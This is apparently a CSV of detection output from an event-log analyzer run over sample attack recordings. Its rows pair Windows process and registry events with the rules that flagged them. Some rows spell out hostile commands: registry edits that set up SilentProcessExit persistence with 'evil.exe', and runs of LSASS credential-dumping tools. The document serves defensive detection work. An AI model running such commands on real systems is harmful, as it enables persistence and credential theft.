2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs""   :  Path: C:\Windows\System32\wscript.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe""  :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe   :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe  :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin  :  Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe  :  User: IEWIN7\IEUser  :  Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE""  -na  :  Path: C:\Windows\System32\NETSTAT.EXE  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo  :  Path: C:\Windows\System32\systeminfo.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Outflank-Dumpert.exe  :  Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump  :  Path: C:\Windows\System32\rundll32.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: AndrewSpecial.exe  :  Path: C:\Users\administrator\Desktop\AndrewSpecial.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A  :  Severity: Severe  :  Type: Trojan  :  User: MSEDGEWIN10\IEUser  :  Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl  :  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx
